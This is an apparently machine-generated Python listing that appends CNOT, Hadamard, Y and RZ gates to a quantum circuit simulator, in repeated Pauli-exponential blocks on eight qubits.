sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.Y(5))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.H(6))
sim.append(sim.H(5))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(4.625813, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.H(5))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.Y(6))
sim.append(sim.Y(5))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(4.625813, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.Y(5))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.H(6))
sim.append(sim.Y(5))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(4.625813, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.Y(5))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.Y(6))
sim.append(sim.H(5))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(4.625813, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.H(5))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.Y(6))
sim.append(sim.Y(5))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(4.625813, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.Y(5))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.H(6))
sim.append(sim.H(5))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(4.625813, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.H(5))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.Y(6))
sim.append(sim.H(5))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(4.625813, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.H(5))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.H(6))
sim.append(sim.Y(5))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(4.625813, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.Y(5))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.H(6))
sim.append(sim.H(5))
sim.append(sim.H(2))
sim.append(sim.H(2))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(1.281574, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.H(5))
sim.append(sim.H(2))
sim.append(sim.H(2))
sim.append(sim.Y(6))
sim.append(sim.Y(5))
sim.append(sim.Y(2))
sim.append(sim.Y(2))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(1.281574, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.Y(5))
sim.append(sim.Y(2))
sim.append(sim.Y(2))
sim.append(sim.H(6))
sim.append(sim.Y(5))
sim.append(sim.H(2))
sim.append(sim.Y(2))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(1.281574, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.Y(5))
sim.append(sim.H(2))
sim.append(sim.Y(2))
sim.append(sim.Y(6))
sim.append(sim.H(5))
sim.append(sim.Y(2))
sim.append(sim.H(2))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(1.281574, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.H(5))
sim.append(sim.Y(2))
sim.append(sim.H(2))
sim.append(sim.Y(6))
sim.append(sim.Y(5))
sim.append(sim.H(2))
sim.append(sim.H(2))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(1.281574, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.Y(5))
sim.append(sim.H(2))
sim.append(sim.H(2))
sim.append(sim.H(6))
sim.append(sim.H(5))
sim.append(sim.Y(2))
sim.append(sim.Y(2))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(1.281574, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.H(5))
sim.append(sim.Y(2))
sim.append(sim.Y(2))
sim.append(sim.Y(6))
sim.append(sim.H(5))
sim.append(sim.H(2))
sim.append(sim.Y(2))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(1.281574, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.H(5))
sim.append(sim.H(2))
sim.append(sim.Y(2))
sim.append(sim.H(6))
sim.append(sim.Y(5))
sim.append(sim.Y(2))
sim.append(sim.H(2))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(1.281574, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.Y(5))
sim.append(sim.Y(2))
sim.append(sim.H(2))
sim.append(sim.H(6))
sim.append(sim.H(5))
sim.append(sim.H(3))
sim.append(sim.H(3))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.RZ(3.22988, 3))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.H(5))
sim.append(sim.H(3))
sim.append(sim.H(3))
sim.append(sim.Y(6))
sim.append(sim.Y(5))
sim.append(sim.Y(3))
sim.append(sim.Y(3))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.RZ(3.22988, 3))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.Y(5))
sim.append(sim.Y(3))
sim.append(sim.Y(3))
sim.append(sim.H(6))
sim.append(sim.Y(5))
sim.append(sim.H(3))
sim.append(sim.Y(3))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.RZ(3.22988, 3))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.Y(5))
sim.append(sim.H(3))
sim.append(sim.Y(3))
sim.append(sim.Y(6))
sim.append(sim.H(5))
sim.append(sim.Y(3))
sim.append(sim.H(3))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.RZ(3.22988, 3))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.H(5))
sim.append(sim.Y(3))
sim.append(sim.H(3))
sim.append(sim.Y(6))
sim.append(sim.Y(5))
sim.append(sim.H(3))
sim.append(sim.H(3))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.RZ(3.22988, 3))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.Y(5))
sim.append(sim.H(3))
sim.append(sim.H(3))
sim.append(sim.H(6))
sim.append(sim.H(5))
sim.append(sim.Y(3))
sim.append(sim.Y(3))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.RZ(3.22988, 3))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.H(5))
sim.append(sim.Y(3))
sim.append(sim.Y(3))
sim.append(sim.Y(6))
sim.append(sim.H(5))
sim.append(sim.H(3))
sim.append(sim.Y(3))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.RZ(3.22988, 3))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.H(5))
sim.append(sim.H(3))
sim.append(sim.Y(3))
sim.append(sim.H(6))
sim.append(sim.Y(5))
sim.append(sim.Y(3))
sim.append(sim.H(3))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.RZ(3.22988, 3))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.Y(5))
sim.append(sim.Y(3))
sim.append(sim.H(3))
sim.append(sim.H(7))
sim.append(sim.H(2))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(6.152348, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(2))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.Y(7))
sim.append(sim.Y(2))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(6.152348, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(2))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.H(7))
sim.append(sim.Y(2))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(6.152348, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(2))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.Y(7))
sim.append(sim.H(2))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(6.152348, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(2))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.Y(7))
sim.append(sim.Y(2))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(6.152348, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(2))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.H(7))
sim.append(sim.H(2))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(6.152348, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(2))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.Y(7))
sim.append(sim.H(2))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(6.152348, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(2))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.H(7))
sim.append(sim.Y(2))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(6.152348, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(2))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.H(7))
sim.append(sim.H(3))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(5.685957, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(3))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.Y(7))
sim.append(sim.Y(3))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(5.685957, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(3))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.H(7))
sim.append(sim.Y(3))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(5.685957, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(3))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.Y(7))
sim.append(sim.H(3))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(5.685957, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(3))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.Y(7))
sim.append(sim.Y(3))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(5.685957, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(3))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.H(7))
sim.append(sim.H(3))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(5.685957, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(3))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.Y(7))
sim.append(sim.H(3))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(5.685957, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(3))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.H(7))
sim.append(sim.Y(3))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(5.685957, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(3))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.H(7))
sim.append(sim.H(3))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.287362, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(3))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.Y(7))
sim.append(sim.Y(3))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.287362, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(3))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.H(7))
sim.append(sim.Y(3))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.287362, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(3))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.Y(7))
sim.append(sim.H(3))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.287362, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(3))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.Y(7))
sim.append(sim.Y(3))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.287362, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(3))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.H(7))
sim.append(sim.H(3))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.287362, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(3))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.Y(7))
sim.append(sim.H(3))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.287362, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(3))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.H(7))
sim.append(sim.Y(3))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.287362, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
